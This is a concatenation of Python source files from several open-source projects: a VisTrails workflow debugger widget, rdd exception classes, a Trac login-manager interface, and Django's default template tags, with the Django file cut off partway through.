import copy
import sys
import time
import os.path
import gui.application
from core.interpreter.default import get_default_interpreter
# ModuleError is referenced in the except clauses below
from core.modules.vistrails_module import ModuleError
from gui.vistrails_palette import QVistrailsPaletteInterface
############################################################################
class QDebugger(QtGui.QWidget, QVistrailsPaletteInterface):
"""
This class provides a dockable interface to the debugger tree.
"""
def __init__(self, parent=None):
QtGui.QWidget.__init__(self, parent=parent)
self.app = gui.application.get_vistrails_application()
self.inspector = QObjectInspector()
layout = QtGui.QVBoxLayout()
layout.setMargin(0)
layout.setSpacing(0)
layout.addWidget(self.inspector)
self.setLayout(layout)
# self.setTitleBarWidget(QtGui.QLabel("Debugger"))
self.setWindowTitle("Debugger")
self.controller = None
self.vistrails_interpreter = get_default_interpreter()
self.vistrails_interpreter.debugger = self
def set_controller(self, c):
"""
set_controller(c) -> None
Set the current vistrails controller to be used by the debugger
"""
self.controller = c
self.update()
def update_values(self):
"""
        update_values() -> None
Update the debugger after an execution with any values that become
available on its input ports.
"""
self.update(update_vals=True)
def update(self, update_vals=False):
"""
update(update_vals=False) -> None
Update the debugger. If the update requires querying modules for input
changes, update_vals should be set to True
"""
pipeline = self.controller.current_pipeline
if pipeline is None:
return
self.inspector.clear_modules()
for module in pipeline.module_list:
if module.is_breakpoint or module.is_watched:
self.inspector.add_module(module)
if update_vals:
(module_objects, _, _) = \
self.vistrails_interpreter.find_persistent_entities(pipeline)
for m_id in self.inspector.modules:
if m_id in module_objects and module_objects[m_id] is not None:
self.inspector.update_values(m_id, module_objects[m_id])
                elif m_id in module_objects:  # persistent instance is None
edges = pipeline.graph.edges_to(m_id)
self.inspector.update_inputs(m_id, module_objects, edges,
pipeline.connections)
def closeEvent(self, e):
"""closeEvent(e) -> None
Event handler called when the dialog is about to close."""
self.emit(QtCore.SIGNAL("debuggerHidden()"))
###############################################################################
# QObjectInspector
class QObjectInspector(QtGui.QTreeWidget):
"""
    This class provides the ability to track and inspect breakpoints added to
    a pipeline. It is meant to be embedded in the QDebugger object to allow
    debugging of workflows in VisTrails.
"""
def __init__(self, parent=None):
QtGui.QTreeWidget.__init__(self, parent)
self.setColumnCount(2)
self.modules = {}
def clear_modules(self):
"""
clear_modules() -> None
Clear the current list of module breakpoints
"""
self.modules = {}
self.clear()
def add_module(self, m):
"""
add_module(m : core.vistrail.module.Module) -> None
        Add the given module, m, as a breakpoint.
"""
# !!! This uses the core.vistrail.module.Module item
item = QDebugModuleItem(self)
item.setText(0, "%s (%d)" % (m.name, m.id))
item.setText(1, "Module Type")
self.modules[m.id] = item
# self.add_dict(m, item)
# self.add_ports(m, item, display_vals=get_vals)
def update_values(self, m_id, persistent_module):
"""
update_values(m_id: long,
persistent_module : subclass of core.modules.vistrails_module.Module)
"""
module_item = self.modules[m_id]
module_item.takeChildren()
self.add_dict(persistent_module, module_item)
self.add_ports(persistent_module, module_item, True)
def update_inputs(self, m_id, persistent_map, edges, connections):
input_ports = {}
for upstream_id, c_id in edges:
if upstream_id in persistent_map and \
persistent_map[upstream_id] is not None:
persistent_module = persistent_map[upstream_id]
connection = connections[c_id]
try:
output_port = \
persistent_module.get_output(connection.source.name)
input_ports[connection.destination.name] = output_port
except ModuleError:
input_ports[connection.destination.name] = None
if len(input_ports) > 0:
module_item = self.modules[m_id]
module_item.takeChildren()
inputs_item = QDebugModuleItem(module_item)
inputs_item.setText(0, "inputPorts")
inputs_item.setText(1, "")
for port_name, port_val in input_ports.iteritems():
self.create_port_item(port_name, port_val, True,
inputs_item)
def add_dict(self, m, parent_item):
"""
add_dict(m, parent_item) -> None
Add the dictionary associated with module m to be displayed
as part of the debug information for that breakpoint.
"""
dict_item = QDebugModuleItem(parent_item)
dict_item.setText(0, "__dict__")
dict_item.setText(1, "")
for k in m.__dict__.keys():
d_val = QDebugModuleItem(dict_item)
d_val.setText(0, str(k))
d_val.setText(1, str(m.__dict__[k]))
def create_port_item(self, port_name, port_value, display_vals=False,
parent=None):
p_item = QDebugModuleItem(parent)
p_item.setText(0, str(port_name))
if display_vals:
p_item.setText(1, str(port_value))
else:
            # Display only the type name of the port's value.
            p_item.setText(1, port_value.__class__.__name__)
def add_ports(self, m, parent_item, display_vals=False):
"""
add_ports(m, item, display_vals=False) -> None
Add port information from module m to the item being displayed in the debugger.
If display_vals is True, fetch the appropriate values from the module's input ports.
"""
inputs_item = QDebugModuleItem(parent_item)
inputs_item.setText(0, "inputPorts")
inputs_item.setText(1, "")
for port_name in m.inputPorts:
try:
port_val = m.getInputListFromPort(port_name)
if len(port_val) == 1:
port_val = port_val[0]
except ModuleError:
port_val = None
self.create_port_item(port_name, port_val, display_vals,
inputs_item)
outputs_item = QDebugModuleItem(parent_item)
outputs_item.setText(0, "outputPorts")
outputs_item.setText(1, "")
for port_name in m.outputPorts:
try:
port_val = m.get_output(port_name)
except ModuleError:
port_val = None
self.create_port_item(port_name, port_val, display_vals,
outputs_item)
########################################################################
# QDebugModuleItem
class QDebugModuleItem(QtGui.QTreeWidgetItem):
"""
This class provides a unique container for adding breakpoints in a workflow
to the debugger.
"""
def __init__(self, parent=None):
QtGui.QTreeWidgetItem.__init__(self, parent)
| CMUSV-VisTrails/WorkflowRecommendation | vistrails/gui/debugger.py | Python | bsd-3-clause | 10,087 |
# -*- coding: utf-8 -*-
"""
rdd.exceptions
~~~~~~~~~~~~~~
This module contains the exceptions raised by rdd.
"""
from requests.exceptions import *
class ReadabilityException(RuntimeError):
"""Base class for Readability exceptions."""
class ShortenerError(ReadabilityException):
"""Failed to shorten URL."""
class MetadataError(ReadabilityException):
"""Failed to retrieve metadata."""
| mlafeldt/rdd.py | rdd/exceptions.py | Python | mit | 407 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015 Geoffrey T. Dairiki
#
"""
"""
from __future__ import absolute_import
from trac.core import Interface
class ILoginManager(Interface):
"""Store authentication state.
"""
def remember_user(req, authname):
""" Set the current user to ``authname``.
This should set a cookie, or do whatever is necessary to
remember the fact that the current user has been authenticated
as the user ``authname``.
"""
def forget_user(req):
""" Forget the current user.
This logs the current user out.
"""
| trac-hacks/trac-oidc | trac_oidc/api.py | Python | bsd-3-clause | 614 |
"""Default tags used by the template system, available to all templates."""
from __future__ import unicode_literals
import sys
import re
from datetime import datetime
from itertools import groupby, cycle as itertools_cycle
import warnings
from django.conf import settings
from django.template.base import (Node, NodeList, Template, Context, Library,
TemplateSyntaxError, VariableDoesNotExist, InvalidTemplateLibrary,
BLOCK_TAG_START, BLOCK_TAG_END, VARIABLE_TAG_START, VARIABLE_TAG_END,
SINGLE_BRACE_START, SINGLE_BRACE_END, COMMENT_TAG_START, COMMENT_TAG_END,
VARIABLE_ATTRIBUTE_SEPARATOR, get_library, token_kwargs, kwarg_re,
render_value_in_context)
from django.template.smartif import IfParser, Literal
from django.template.defaultfilters import date
from django.utils.encoding import smart_text
from django.utils.safestring import mark_safe
from django.utils.html import format_html
from django.utils import six
from django.utils import timezone
register = Library()
class AutoEscapeControlNode(Node):
"""Implements the actions of the autoescape tag."""
def __init__(self, setting, nodelist):
self.setting, self.nodelist = setting, nodelist
def render(self, context):
old_setting = context.autoescape
context.autoescape = self.setting
output = self.nodelist.render(context)
context.autoescape = old_setting
if self.setting:
return mark_safe(output)
else:
return output
class CommentNode(Node):
def render(self, context):
return ''
class CsrfTokenNode(Node):
def render(self, context):
csrf_token = context.get('csrf_token', None)
if csrf_token:
if csrf_token == 'NOTPROVIDED':
return format_html("")
else:
return format_html("<input type='hidden' name='csrfmiddlewaretoken' value='{0}' />", csrf_token)
else:
# It's very probable that the token is missing because of
# misconfiguration, so we raise a warning
from django.conf import settings
if settings.DEBUG:
warnings.warn("A {% csrf_token %} was used in a template, but the context did not provide the value. This is usually caused by not using RequestContext.")
return ''
class CycleNode(Node):
def __init__(self, cyclevars, variable_name=None, silent=False, escape=False):
self.cyclevars = cyclevars
self.variable_name = variable_name
self.silent = silent
self.escape = escape # only while the "future" version exists
def render(self, context):
if self not in context.render_context:
# First time the node is rendered in template
context.render_context[self] = itertools_cycle(self.cyclevars)
cycle_iter = context.render_context[self]
value = next(cycle_iter).resolve(context)
if self.variable_name:
context[self.variable_name] = value
if self.silent:
return ''
if not self.escape:
value = mark_safe(value)
return render_value_in_context(value, context)
class DebugNode(Node):
def render(self, context):
from pprint import pformat
output = [pformat(val) for val in context]
output.append('\n\n')
output.append(pformat(sys.modules))
return ''.join(output)
class FilterNode(Node):
def __init__(self, filter_expr, nodelist):
self.filter_expr, self.nodelist = filter_expr, nodelist
def render(self, context):
output = self.nodelist.render(context)
# Apply filters.
context.update({'var': output})
filtered = self.filter_expr.resolve(context)
context.pop()
return filtered
class FirstOfNode(Node):
def __init__(self, variables, escape=False):
self.vars = variables
self.escape = escape # only while the "future" version exists
def render(self, context):
for var in self.vars:
value = var.resolve(context, True)
if value:
if not self.escape:
value = mark_safe(value)
return render_value_in_context(value, context)
return ''
class ForNode(Node):
child_nodelists = ('nodelist_loop', 'nodelist_empty')
def __init__(self, loopvars, sequence, is_reversed, nodelist_loop, nodelist_empty=None):
self.loopvars, self.sequence = loopvars, sequence
self.is_reversed = is_reversed
self.nodelist_loop = nodelist_loop
if nodelist_empty is None:
self.nodelist_empty = NodeList()
else:
self.nodelist_empty = nodelist_empty
def __repr__(self):
reversed_text = ' reversed' if self.is_reversed else ''
return "<For Node: for %s in %s, tail_len: %d%s>" % \
(', '.join(self.loopvars), self.sequence, len(self.nodelist_loop),
reversed_text)
def __iter__(self):
for node in self.nodelist_loop:
yield node
for node in self.nodelist_empty:
yield node
def render(self, context):
if 'forloop' in context:
parentloop = context['forloop']
else:
parentloop = {}
context.push()
try:
values = self.sequence.resolve(context, True)
except VariableDoesNotExist:
values = []
if values is None:
values = []
if not hasattr(values, '__len__'):
values = list(values)
len_values = len(values)
if len_values < 1:
context.pop()
return self.nodelist_empty.render(context)
nodelist = NodeList()
if self.is_reversed:
values = reversed(values)
unpack = len(self.loopvars) > 1
# Create a forloop value in the context. We'll update counters on each
# iteration just below.
loop_dict = context['forloop'] = {'parentloop': parentloop}
for i, item in enumerate(values):
# Shortcuts for current loop iteration number.
loop_dict['counter0'] = i
loop_dict['counter'] = i+1
# Reverse counter iteration numbers.
loop_dict['revcounter'] = len_values - i
loop_dict['revcounter0'] = len_values - i - 1
# Boolean values designating first and last times through loop.
loop_dict['first'] = (i == 0)
loop_dict['last'] = (i == len_values - 1)
pop_context = False
if unpack:
# If there are multiple loop variables, unpack the item into
# them.
try:
unpacked_vars = dict(zip(self.loopvars, item))
except TypeError:
pass
else:
pop_context = True
context.update(unpacked_vars)
else:
context[self.loopvars[0]] = item
# In TEMPLATE_DEBUG mode provide source of the node which
# actually raised the exception
if settings.TEMPLATE_DEBUG:
for node in self.nodelist_loop:
try:
nodelist.append(node.render(context))
except Exception as e:
if not hasattr(e, 'django_template_source'):
e.django_template_source = node.source
raise
else:
for node in self.nodelist_loop:
nodelist.append(node.render(context))
if pop_context:
# The loop variables were pushed on to the context so pop them
# off again. This is necessary because the tag lets the length
# of loopvars differ to the length of each set of items and we
# don't want to leave any vars from the previous loop on the
# context.
context.pop()
context.pop()
return nodelist.render(context)
class IfChangedNode(Node):
child_nodelists = ('nodelist_true', 'nodelist_false')
def __init__(self, nodelist_true, nodelist_false, *varlist):
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self._varlist = varlist
def render(self, context):
# Init state storage
state_frame = self._get_context_stack_frame(context)
if self not in state_frame:
state_frame[self] = None
nodelist_true_output = None
try:
if self._varlist:
# Consider multiple parameters. This automatically behaves
# like an OR evaluation of the multiple variables.
compare_to = [var.resolve(context, True) for var in self._varlist]
else:
# The "{% ifchanged %}" syntax (without any variables) compares the rendered output.
compare_to = nodelist_true_output = self.nodelist_true.render(context)
except VariableDoesNotExist:
compare_to = None
if compare_to != state_frame[self]:
state_frame[self] = compare_to
return nodelist_true_output or self.nodelist_true.render(context) # render true block if not already rendered
elif self.nodelist_false:
return self.nodelist_false.render(context)
return ''
def _get_context_stack_frame(self, context):
# The Context object behaves like a stack where each template tag can create a new scope.
# Find the place where to store the state to detect changes.
if 'forloop' in context:
# Ifchanged is bound to the local for loop.
# When there is a loop-in-loop, the state is bound to the inner loop,
# so it resets when the outer loop continues.
return context['forloop']
else:
# Using ifchanged outside loops. Effectively this is a no-op because the state is associated with 'self'.
return context.render_context
class IfEqualNode(Node):
child_nodelists = ('nodelist_true', 'nodelist_false')
def __init__(self, var1, var2, nodelist_true, nodelist_false, negate):
self.var1, self.var2 = var1, var2
self.nodelist_true, self.nodelist_false = nodelist_true, nodelist_false
self.negate = negate
def __repr__(self):
return "<IfEqualNode>"
def render(self, context):
val1 = self.var1.resolve(context, True)
val2 = self.var2.resolve(context, True)
if (self.negate and val1 != val2) or (not self.negate and val1 == val2):
return self.nodelist_true.render(context)
return self.nodelist_false.render(context)
class IfNode(Node):
def __init__(self, conditions_nodelists):
self.conditions_nodelists = conditions_nodelists
def __repr__(self):
return "<IfNode>"
def __iter__(self):
for _, nodelist in self.conditions_nodelists:
for node in nodelist:
yield node
@property
def nodelist(self):
return NodeList(node for _, nodelist in self.conditions_nodelists for node in nodelist)
def render(self, context):
for condition, nodelist in self.conditions_nodelists:
if condition is not None: # if / elif clause
try:
match = condition.eval(context)
except VariableDoesNotExist:
match = None
else: # else clause
match = True
if match:
return nodelist.render(context)
return ''
class RegroupNode(Node):
def __init__(self, target, expression, var_name):
self.target, self.expression = target, expression
self.var_name = var_name
def resolve_expression(self, obj, context):
# This method is called for each object in self.target. See regroup()
# for the reason why we temporarily put the object in the context.
context[self.var_name] = obj
return self.expression.resolve(context, True)
def render(self, context):
obj_list = self.target.resolve(context, True)
        if obj_list is None:
# target variable wasn't found in context; fail silently.
context[self.var_name] = []
return ''
# List of dictionaries in the format:
# {'grouper': 'key', 'list': [list of contents]}.
context[self.var_name] = [
{'grouper': key, 'list': list(val)}
for key, val in
groupby(obj_list, lambda obj: self.resolve_expression(obj, context))
]
return ''
def include_is_allowed(filepath):
for root in settings.ALLOWED_INCLUDE_ROOTS:
if filepath.startswith(root):
return True
return False
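# Note: include_is_allowed() above gates the {% ssi %} tag below; with, for
# example, ALLOWED_INCLUDE_ROOTS = ('/var/www/includes/',) (an illustrative
# value), only files under that prefix may be included.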
class SsiNode(Node):
def __init__(self, filepath, parsed):
self.filepath = filepath
self.parsed = parsed
def render(self, context):
filepath = self.filepath.resolve(context)
if not include_is_allowed(filepath):
if settings.DEBUG:
return "[Didn't have permission to include file]"
else:
return '' # Fail silently for invalid includes.
try:
with open(filepath, 'r') as fp:
output = fp.read()
except IOError:
output = ''
if self.parsed:
try:
t = Template(output, name=filepath)
return t.render(context)
except TemplateSyntaxError as e:
if settings.DEBUG:
return "[Included template had syntax error: %s]" % e
else:
return '' # Fail silently for invalid included templates.
return output
class LoadNode(Node):
def render(self, context):
return ''
class NowNode(Node):
def __init__(self, format_string):
self.format_string = format_string
def render(self, context):
tzinfo = timezone.get_current_timezone() if settings.USE_TZ else None
return date(datetime.now(tz=tzinfo), self.format_string)
class SpacelessNode(Node):
def __init__(self, nodelist):
self.nodelist = nodelist
def render(self, context):
from django.utils.html import strip_spaces_between_tags
return strip_spaces_between_tags(self.nodelist.render(context).strip())
class TemplateTagNode(Node):
mapping = {'openblock': BLOCK_TAG_START,
'closeblock': BLOCK_TAG_END,
'openvariable': VARIABLE_TAG_START,
'closevariable': VARIABLE_TAG_END,
'openbrace': SINGLE_BRACE_START,
'closebrace': SINGLE_BRACE_END,
'opencomment': COMMENT_TAG_START,
'closecomment': COMMENT_TAG_END,
}
def __init__(self, tagtype):
self.tagtype = tagtype
def render(self, context):
return self.mapping.get(self.tagtype, '')
class URLNode(Node):
def __init__(self, view_name, args, kwargs, asvar):
self.view_name = view_name
self.args = args
self.kwargs = kwargs
self.asvar = asvar
def render(self, context):
from django.core.urlresolvers import reverse, NoReverseMatch
args = [arg.resolve(context) for arg in self.args]
kwargs = dict([(smart_text(k, 'ascii'), v.resolve(context))
for k, v in self.kwargs.items()])
view_name = self.view_name.resolve(context)
if not view_name:
raise NoReverseMatch("'url' requires a non-empty first argument. "
"The syntax changed in Django 1.5, see the docs.")
# Try to look up the URL twice: once given the view name, and again
# relative to what we guess is the "main" app. If they both fail,
# re-raise the NoReverseMatch unless we're using the
# {% url ... as var %} construct in which case return nothing.
url = ''
try:
url = reverse(view_name, args=args, kwargs=kwargs, current_app=context.current_app)
except NoReverseMatch:
exc_info = sys.exc_info()
if settings.SETTINGS_MODULE:
project_name = settings.SETTINGS_MODULE.split('.')[0]
try:
url = reverse(project_name + '.' + view_name,
args=args, kwargs=kwargs,
current_app=context.current_app)
except NoReverseMatch:
if self.asvar is None:
# Re-raise the original exception, not the one with
# the path relative to the project. This makes a
# better error message.
six.reraise(*exc_info)
else:
if self.asvar is None:
raise
if self.asvar:
context[self.asvar] = url
return ''
else:
return url
class VerbatimNode(Node):
def __init__(self, content):
self.content = content
def render(self, context):
return self.content
class WidthRatioNode(Node):
def __init__(self, val_expr, max_expr, max_width):
self.val_expr = val_expr
self.max_expr = max_expr
self.max_width = max_width
def render(self, context):
try:
value = self.val_expr.resolve(context)
max_value = self.max_expr.resolve(context)
max_width = int(self.max_width.resolve(context))
except VariableDoesNotExist:
return ''
except (ValueError, TypeError):
raise TemplateSyntaxError("widthratio final argument must be a number")
try:
value = float(value)
max_value = float(max_value)
ratio = (value / max_value) * max_width
except ZeroDivisionError:
return '0'
except (ValueError, TypeError):
return ''
return str(int(round(ratio)))
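# Worked example (illustrative): {% widthratio 175 200 100 %} computes
# round(175 / 200.0 * 100) and renders "88".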
class WithNode(Node):
def __init__(self, var, name, nodelist, extra_context=None):
self.nodelist = nodelist
# var and name are legacy attributes, being left in case they are used
# by third-party subclasses of this Node.
self.extra_context = extra_context or {}
if name:
self.extra_context[name] = var
def __repr__(self):
return "<WithNode>"
def render(self, context):
values = dict([(key, val.resolve(context)) for key, val in
six.iteritems(self.extra_context)])
context.update(values)
output = self.nodelist.render(context)
context.pop()
return output
@register.tag
def autoescape(parser, token):
"""
Force autoescape behavior for this block.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
args = token.contents.split()
if len(args) != 2:
raise TemplateSyntaxError("'autoescape' tag requires exactly one argument.")
arg = args[1]
if arg not in ('on', 'off'):
raise TemplateSyntaxError("'autoescape' argument should be 'on' or 'off'")
nodelist = parser.parse(('endautoescape',))
parser.delete_first_token()
return AutoEscapeControlNode((arg == 'on'), nodelist)
@register.tag
def comment(parser, token):
"""
Ignores everything between ``{% comment %}`` and ``{% endcomment %}``.
"""
parser.skip_past('endcomment')
return CommentNode()
@register.tag
def cycle(parser, token, escape=False):
"""
Cycles among the given strings each time this tag is encountered.
Within a loop, cycles among the given strings each time through
the loop::
{% for o in some_list %}
<tr class="{% cycle 'row1' 'row2' %}">
...
</tr>
{% endfor %}
Outside of a loop, give the values a unique name the first time you call
    it, then use that name each successive time through::
<tr class="{% cycle 'row1' 'row2' 'row3' as rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
<tr class="{% cycle rowcolors %}">...</tr>
You can use any number of values, separated by spaces. Commas can also
be used to separate values; if a comma is used, the cycle values are
interpreted as literal strings.
The optional flag "silent" can be used to prevent the cycle declaration
from returning any value::
{% for o in some_list %}
{% cycle 'row1' 'row2' as rowcolors silent %}
<tr class="{{ rowcolors }}">{% include "subtemplate.html " %}</tr>
{% endfor %}
"""
if not escape:
warnings.warn(
"'The `cycle` template tag is changing to escape its arguments; "
"the non-autoescaping version is deprecated. Load it "
"from the `future` tag library to start using the new behavior.",
PendingDeprecationWarning, stacklevel=2)
# Note: This returns the exact same node on each {% cycle name %} call;
# that is, the node object returned from {% cycle a b c as name %} and the
# one returned from {% cycle name %} are the exact same object. This
# shouldn't cause problems (heh), but if it does, now you know.
#
# Ugly hack warning: This stuffs the named template dict into parser so
# that names are only unique within each template (as opposed to using
# a global variable, which would make cycle names have to be unique across
# *all* templates.
args = token.split_contents()
if len(args) < 2:
raise TemplateSyntaxError("'cycle' tag requires at least two arguments")
if ',' in args[1]:
# Backwards compatibility: {% cycle a,b %} or {% cycle a,b as foo %}
# case.
args[1:2] = ['"%s"' % arg for arg in args[1].split(",")]
if len(args) == 2:
# {% cycle foo %} case.
name = args[1]
if not hasattr(parser, '_namedCycleNodes'):
raise TemplateSyntaxError("No named cycles in template. '%s' is not defined" % name)
if not name in parser._namedCycleNodes:
raise TemplateSyntaxError("Named cycle '%s' does not exist" % name)
return parser._namedCycleNodes[name]
as_form = False
if len(args) > 4:
# {% cycle ... as foo [silent] %} case.
if args[-3] == "as":
if args[-1] != "silent":
raise TemplateSyntaxError("Only 'silent' flag is allowed after cycle's name, not '%s'." % args[-1])
as_form = True
silent = True
args = args[:-1]
elif args[-2] == "as":
as_form = True
silent = False
if as_form:
name = args[-1]
values = [parser.compile_filter(arg) for arg in args[1:-2]]
node = CycleNode(values, name, silent=silent, escape=escape)
if not hasattr(parser, '_namedCycleNodes'):
parser._namedCycleNodes = {}
parser._namedCycleNodes[name] = node
else:
values = [parser.compile_filter(arg) for arg in args[1:]]
node = CycleNode(values, escape=escape)
return node
@register.tag
def csrf_token(parser, token):
return CsrfTokenNode()
@register.tag
def debug(parser, token):
"""
Outputs a whole load of debugging information, including the current
context and imported modules.
Sample usage::
<pre>
{% debug %}
</pre>
"""
return DebugNode()
@register.tag('filter')
def do_filter(parser, token):
"""
Filters the contents of the block through variable filters.
Filters can also be piped through each other, and they can have
arguments -- just like in variable syntax.
Sample usage::
{% filter force_escape|lower %}
This text will be HTML-escaped, and will appear in lowercase.
{% endfilter %}
Note that the ``escape`` and ``safe`` filters are not acceptable arguments.
Instead, use the ``autoescape`` tag to manage autoescaping for blocks of
template code.
"""
# token.split_contents() isn't useful here because this tag doesn't accept variable as arguments
_, rest = token.contents.split(None, 1)
filter_expr = parser.compile_filter("var|%s" % (rest))
for func, unused in filter_expr.filters:
if getattr(func, '_decorated_function', func).__name__ in ('escape', 'safe'):
raise TemplateSyntaxError('"filter %s" is not permitted. Use the "autoescape" tag instead.' % func.__name__)
nodelist = parser.parse(('endfilter',))
parser.delete_first_token()
return FilterNode(filter_expr, nodelist)
@register.tag
def firstof(parser, token, escape=False):
"""
Outputs the first variable passed that is not False, without escaping.
Outputs nothing if all the passed variables are False.
Sample usage::
{% firstof var1 var2 var3 %}
This is equivalent to::
{% if var1 %}
{{ var1|safe }}
{% elif var2 %}
{{ var2|safe }}
{% elif var3 %}
{{ var3|safe }}
{% endif %}
but obviously much cleaner!
You can also use a literal string as a fallback value in case all
passed variables are False::
{% firstof var1 var2 var3 "fallback value" %}
If you want to escape the output, use a filter tag::
{% filter force_escape %}
{% firstof var1 var2 var3 "fallback value" %}
{% endfilter %}
"""
if not escape:
warnings.warn(
"'The `firstof` template tag is changing to escape its arguments; "
"the non-autoescaping version is deprecated. Load it "
"from the `future` tag library to start using the new behavior.",
PendingDeprecationWarning, stacklevel=2)
bits = token.split_contents()[1:]
if len(bits) < 1:
raise TemplateSyntaxError("'firstof' statement requires at least one argument")
return FirstOfNode([parser.compile_filter(bit) for bit in bits], escape=escape)
@register.tag('for')
def do_for(parser, token):
"""
Loops over each item in an array.
For example, to display a list of athletes given ``athlete_list``::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
</ul>
You can loop over a list in reverse by using
``{% for obj in list reversed %}``.
You can also unpack multiple values from a two-dimensional array::
{% for key,value in dict.items %}
{{ key }}: {{ value }}
{% endfor %}
The ``for`` tag can take an optional ``{% empty %}`` clause that will
be displayed if the given array is empty or could not be found::
<ul>
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% empty %}
<li>Sorry, no athletes in this list.</li>
{% endfor %}
        </ul>
The above is equivalent to -- but shorter, cleaner, and possibly faster
than -- the following::
<ul>
          {% if athlete_list %}
{% for athlete in athlete_list %}
<li>{{ athlete.name }}</li>
{% endfor %}
{% else %}
<li>Sorry, no athletes in this list.</li>
{% endif %}
</ul>
The for loop sets a number of variables available within the loop:
========================== ================================================
Variable Description
========================== ================================================
``forloop.counter`` The current iteration of the loop (1-indexed)
``forloop.counter0`` The current iteration of the loop (0-indexed)
``forloop.revcounter`` The number of iterations from the end of the
loop (1-indexed)
``forloop.revcounter0`` The number of iterations from the end of the
loop (0-indexed)
``forloop.first`` True if this is the first time through the loop
``forloop.last`` True if this is the last time through the loop
``forloop.parentloop`` For nested loops, this is the loop "above" the
current one
========================== ================================================
"""
bits = token.split_contents()
if len(bits) < 4:
raise TemplateSyntaxError("'for' statements should have at least four"
" words: %s" % token.contents)
is_reversed = bits[-1] == 'reversed'
in_index = -3 if is_reversed else -2
if bits[in_index] != 'in':
raise TemplateSyntaxError("'for' statements should use the format"
" 'for x in y': %s" % token.contents)
loopvars = re.split(r' *, *', ' '.join(bits[1:in_index]))
for var in loopvars:
if not var or ' ' in var:
raise TemplateSyntaxError("'for' tag received an invalid argument:"
" %s" % token.contents)
sequence = parser.compile_filter(bits[in_index+1])
nodelist_loop = parser.parse(('empty', 'endfor',))
token = parser.next_token()
if token.contents == 'empty':
nodelist_empty = parser.parse(('endfor',))
parser.delete_first_token()
else:
nodelist_empty = None
return ForNode(loopvars, sequence, is_reversed, nodelist_loop, nodelist_empty)
def do_ifequal(parser, token, negate):
bits = list(token.split_contents())
if len(bits) != 3:
raise TemplateSyntaxError("%r takes two arguments" % bits[0])
end_tag = 'end' + bits[0]
nodelist_true = parser.parse(('else', end_tag))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse((end_tag,))
parser.delete_first_token()
else:
nodelist_false = NodeList()
val1 = parser.compile_filter(bits[1])
val2 = parser.compile_filter(bits[2])
return IfEqualNode(val1, val2, nodelist_true, nodelist_false, negate)
@register.tag
def ifequal(parser, token):
"""
Outputs the contents of the block if the two arguments equal each other.
Examples::
{% ifequal user.id comment.user_id %}
...
{% endifequal %}
{% ifnotequal user.id comment.user_id %}
...
{% else %}
...
{% endifnotequal %}
"""
return do_ifequal(parser, token, False)
@register.tag
def ifnotequal(parser, token):
"""
Outputs the contents of the block if the two arguments are not equal.
See ifequal.
"""
return do_ifequal(parser, token, True)
class TemplateLiteral(Literal):
def __init__(self, value, text):
self.value = value
self.text = text # for better error messages
def display(self):
return self.text
def eval(self, context):
return self.value.resolve(context, ignore_failures=True)
class TemplateIfParser(IfParser):
error_class = TemplateSyntaxError
def __init__(self, parser, *args, **kwargs):
self.template_parser = parser
super(TemplateIfParser, self).__init__(*args, **kwargs)
def create_var(self, value):
return TemplateLiteral(self.template_parser.compile_filter(value), value)
@register.tag('if')
def do_if(parser, token):
"""
The ``{% if %}`` tag evaluates a variable, and if that variable is "true"
(i.e., exists, is not empty, and is not a false boolean value), the
contents of the block are output:
::
{% if athlete_list %}
Number of athletes: {{ athlete_list|count }}
{% elif athlete_in_locker_room_list %}
Athletes should be out of the locker room soon!
{% else %}
No athletes.
{% endif %}
In the above, if ``athlete_list`` is not empty, the number of athletes will
be displayed by the ``{{ athlete_list|count }}`` variable.
    As you can see, the ``if`` tag may take one or several ``{% elif %}``
clauses, as well as an ``{% else %}`` clause that will be displayed if all
previous conditions fail. These clauses are optional.
``if`` tags may use ``or``, ``and`` or ``not`` to test a number of
variables or to negate a given variable::
{% if not athlete_list %}
There are no athletes.
{% endif %}
{% if athlete_list or coach_list %}
There are some athletes or some coaches.
{% endif %}
{% if athlete_list and coach_list %}
            Both athletes and coaches are available.
{% endif %}
{% if not athlete_list or coach_list %}
There are no athletes, or there are some coaches.
{% endif %}
{% if athlete_list and not coach_list %}
There are some athletes and absolutely no coaches.
{% endif %}
Comparison operators are also available, and the use of filters is also
allowed, for example::
{% if articles|length >= 5 %}...{% endif %}
Arguments and operators _must_ have a space between them, so
``{% if 1>2 %}`` is not a valid if tag.
All supported operators are: ``or``, ``and``, ``in``, ``not in``
``==`` (or ``=``), ``!=``, ``>``, ``>=``, ``<`` and ``<=``.
Operator precedence follows Python.
"""
# {% if ... %}
bits = token.split_contents()[1:]
condition = TemplateIfParser(parser, bits).parse()
nodelist = parser.parse(('elif', 'else', 'endif'))
conditions_nodelists = [(condition, nodelist)]
token = parser.next_token()
# {% elif ... %} (repeatable)
while token.contents.startswith('elif'):
bits = token.split_contents()[1:]
condition = TemplateIfParser(parser, bits).parse()
nodelist = parser.parse(('elif', 'else', 'endif'))
conditions_nodelists.append((condition, nodelist))
token = parser.next_token()
# {% else %} (optional)
if token.contents == 'else':
nodelist = parser.parse(('endif',))
conditions_nodelists.append((None, nodelist))
token = parser.next_token()
# {% endif %}
assert token.contents == 'endif'
return IfNode(conditions_nodelists)
@register.tag
def ifchanged(parser, token):
"""
Checks if a value has changed from the last iteration of a loop.
The ``{% ifchanged %}`` block tag is used within a loop. It has two
possible uses.
1. Checks its own rendered contents against its previous state and only
displays the content if it has changed. For example, this displays a
list of days, only displaying the month if it changes::
<h1>Archive for {{ year }}</h1>
{% for date in days %}
{% ifchanged %}<h3>{{ date|date:"F" }}</h3>{% endifchanged %}
<a href="{{ date|date:"M/d"|lower }}/">{{ date|date:"j" }}</a>
{% endfor %}
2. If given one or more variables, check whether any variable has changed.
For example, the following shows the date every time it changes, while
showing the hour if either the hour or the date has changed::
{% for date in days %}
{% ifchanged date.date %} {{ date.date }} {% endifchanged %}
{% ifchanged date.hour date.date %}
{{ date.hour }}
{% endifchanged %}
{% endfor %}
"""
bits = token.split_contents()
nodelist_true = parser.parse(('else', 'endifchanged'))
token = parser.next_token()
if token.contents == 'else':
nodelist_false = parser.parse(('endifchanged',))
parser.delete_first_token()
else:
nodelist_false = NodeList()
values = [parser.compile_filter(bit) for bit in bits[1:]]
